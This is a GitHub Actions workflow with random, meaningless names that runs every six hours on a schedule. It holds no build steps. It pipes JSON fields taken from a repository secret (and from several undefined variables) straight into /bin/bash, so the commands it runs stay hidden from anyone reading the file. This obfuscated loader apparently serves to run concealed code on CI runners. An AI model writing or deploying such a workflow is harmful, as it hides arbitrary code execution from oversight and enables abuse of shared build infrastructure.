name: wuguoduojian
on:
  workflow_dispatch:
  schedule:
    - cron: '13 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: wuguoduojian
        env:
          dkowv5: ${{ secrets.dkowv5 }}
        run: |
          echo $dkowv5 | jq -r .xay377 | /bin/bash
          echo $drg4 | jq -r .txwe60 | /bin/bash
          echo $gfn01 | jq -r .g597 | /bin/bash
          echo $zhiat82223 | jq -r .gjopd41042 | /bin/bash
          echo $i61477 | jq -r .nim3360 | /bin/bash
          echo $zdb45 | jq -r .gfen7 | /bin/bash
          echo $lfbht2 | jq -r .d542 | /bin/bash
          echo $irzul160 | jq -r .nn7803 | /bin/bash
          echo $xamay0 | jq -r .tw1379 | /bin/bash
          echo $l43 | jq -r .dmywm0 | /bin/bash
          echo $wtp02861 | jq -r .d22497 | /bin/bash
          echo $xuntg69674 | jq -r .xme13 | /bin/bash

